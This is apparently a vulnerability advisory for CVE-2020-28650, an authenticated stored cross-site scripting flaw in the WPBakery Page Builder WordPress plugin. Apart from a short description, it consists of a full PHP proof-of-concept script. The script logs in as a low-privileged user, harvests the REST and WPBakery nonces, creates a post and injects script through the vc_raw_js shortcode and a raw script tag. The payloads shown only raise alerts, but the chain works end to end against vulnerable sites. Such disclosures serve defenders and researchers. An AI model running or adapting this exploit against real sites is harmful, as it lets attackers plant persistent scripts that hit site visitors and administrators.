WPBakery Page Builder < 6.4.1 – Authenticated Stored Cross-Site Scripting (XSS) | CVE 2020-28650

Description

Wordfence discovered an Authenticated Stored Cross-Site Scripting (XSS) security vulnerability within the WPBakery Page Builder WordPress plugin.
The vulnerability could allow a low privileged user, such as contributor, to inject malicious JavaScript into posts.

Proof of Concept

<?php

echo 'Hi! Let\'s Exploit!';
// Settings
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];

//Json Encode Our New Post
$data = array(
 "title" => "Exploit Post",
 "content" => "<!-- wp:paragraph -->\n<p>Test2</p>\n<!-- /wp:paragraph -->",
 "status"=>"pending");

$postdata = json_encode($data);

//Get Json post data length
$length = strlen($postdata);

echo 'Logging in!';

// 1) Log in as contributor+
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
 'log' => $wp_user,
 'pwd' => $wp_pass,
 'rememberme' => 'forever',
 'wp-submit' => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

echo 'Grabbing Rest API!';
// Pull the Rest API Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

//Rest API Nonce
preg_match('/wp\.apiFetch\.createNonceMiddleware\(\s"([^"]+)"\s\)/', $content, $matches);
$restnonce = $matches[1];

echo 'Creating New Post and Grabbing Page ID!';
//Create New Post
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-json/wp/v2/posts');
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt( $ch, CURLOPT_HTTPHEADER, array('Content-Type: application/json',
 "X-WP-Nonce: $restnonce",
 "Content-Length: $length"));
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
$content = curl_exec($ch);
curl_close($ch);

//Grab the page-id
preg_match('/"id":([^"]+),/', $content, $matches);
$pageid = $matches[1];

echo 'Grabbing VC Nonce!';

//Grab Some More Nonces
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/post.php?post_id=' . $pageid . '&vc_action=vc_inline');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

//WPBAKERY NONCE
preg_match('/vcAdminNonce\s=\s\'([^"]+)\';/', $content, $matches);
$vcnonce = $matches[1];

echo 'XSS\'ing!';
//EDIT THE POST WITH XSS!
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
 'post_id' => $pageid,
 'vc_inline' => 'true',
 '_vcnonce' => $vcnonce,
 'vc_post_custom_css' => '',
 'action' => 'vc_save',
 'content' => '<p>[vc_row][vc_column][vc_raw_js]JTNDc2NyaXB0JTNFJTIwYWxlcnQlMjglMjAlMjJFdmlsJTIwU2NyaXB0JTIwSGVyZSUyMSUyMiUyMCUyOSUyMCUzQyUyRnNjcmlwdCUzRQ==[/vc_raw_js][/vc_column][/vc_row]<script>alert("XSS 2")</script>'
]);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);

?>